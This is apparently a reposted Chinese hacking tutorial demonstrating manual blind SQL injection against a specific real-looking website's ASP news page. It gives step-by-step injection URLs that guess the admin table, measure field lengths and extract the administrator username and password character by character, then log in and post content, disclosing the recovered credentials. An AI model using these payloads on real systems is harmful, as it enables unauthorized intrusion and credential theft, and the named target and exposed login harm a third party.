| 关键词: nbsp 20 user 字段 default 就是 admin xinwen cataid 页面 |
哈,大家好,好久不玩这些东西了。最近看到一些人用别人的工具到处搞破坏,灰客,白客都出来了。。。。我晕~~~~是不是还有花客,粉客什么的。。。其实都是一些只会用别人工具的菜鸟,还敢开站来毒害青少年!强烈鄙视!好了,费话不多说了,今天给大家做个手工注入的动画。大家见笑了。 http://www.sx165.com/xinwen/default.asp?cataid=3这个就是今天摧残的对象! sql注入漏洞判断: 1=1返回正常页面,1=2时候报错。 [%20就是空格的解码] 好了,现在可以说明它存在漏洞!下面我们开始注入! 1。我先猜管理员ID,假设存在admin表名 http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20id%20from%20admin%20where%20id%20=3) 这里id=3返回了正常页面,说明管理员存在id是3,也同时证明了我刚才猜解存在admin这个表名 2。下面我开始猜解用户名,我假设存在user字段 这里len(user)>3,["len"就是长度也意思],返回正页面,证明我猜解存在user字段正确,并且user字段的长度是大于3的! 3%20and%20id=3">http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20user%20from%20admin%20where%20len(user)>3%20and%20id=3) 这里len(user)>4,返回错误页面!既然大于3又不大于4,那么它一定是等于4了!!! 4%20and%20id=3">http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20user%20from%20admin%20where%20len(user)>4%20and%20id=3) 看!len(user)=4返回正常页面了吧!说明user字段长度是4! http://www.sx165.com/xinwen/default.asp?cataid=3%20and%20exists(select%20user%20from%20admin%20where%20len(user)=4%20and%20id=3) 3.现在我开始破解user字段的值! 这里面涉及到mid函数,和ASC字符! mid(字符值,字符开始位置,字串长度),比如:mid(thedaybefore,1,1)就是1,mid(thedaybefore,1,3)就是the asc(***),“****”的内容便是asc码转换后的值!这里我们借助一个asc码转换的工具 http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(user,1,1))>119 and id=3)返回正确页面 http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(user,1,1))>120 and id=3)返回错误页面 所以asc码的值是120!下面通过工具进行转换 所以第一位用户名就是x,下面我们进行第2,3,4位的猜解!!!go on! 大于104,不大于105所以就是105啦! 所以第二位是i 大于109小于110,所以是110,ASC110=n 第三位是n 大于102,且不大于103,所以就是103,ASC103=g 哈哈!用户名已经全部猜解完成了!xing 现在开始猜解密码!同理!大家复习一下! 现在可以肯定存在字段名pwd!下面就不打字了,大家看我操作吧! 密码位数:4 晕!在这里打吧,上面太乱了!http://www.sx165.com/xinwen/default.asp?cataid=3 and 3=(select id from admin where asc(mid(pwd,1,1))>100 and id=3) 120,105,110,103 xing,晕!密码和用户名一样~~~~我服了那个网管了。。。。。 下面登陆上去看看! 新闻已经成功保存了... 哈哈,这个站大家就不要再搞了,管理员我已经通知了,好了,就到这里 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|